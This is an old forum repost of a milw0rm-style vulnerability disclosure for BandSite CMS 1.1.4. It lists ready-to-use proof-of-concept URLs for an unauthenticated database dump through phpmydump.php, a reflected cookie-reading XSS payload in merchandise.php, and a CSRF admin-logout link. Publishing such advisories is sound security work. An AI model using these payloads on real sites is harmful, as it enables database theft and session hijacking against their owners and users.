SirGod Posted August 21, 2008 Report Posted August 21, 2008 ###########################################################################[+] BandSite CMS 1.1.4 Arbitrary Download Database/XSS/CSRF[+] Discovered By SirGod [+] MorTal TeaM [+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN###########################################################################[+] Arbitrary Download DatabaseGo to [url]http://localhost/[/url][Path]/adminpanel/phpmydump.phpand the download will begin ( database.sql ) .[+] Cross Site Scripting [url]http://localhost/[/url][Path]/merchandise.php?type=[XSS] [url]http://localhost/[/url][Path]/merchandise.php?type=<script>alert(document.cookie)</script>[+] Cross Site Request Forgery If a logged in user with administrator privilegies click the following url he will be logged out. [url]http://localhost/[/url][Path]/adminpanel/logout.php############################################################################ milw0rm.com [2008-08-21] Quote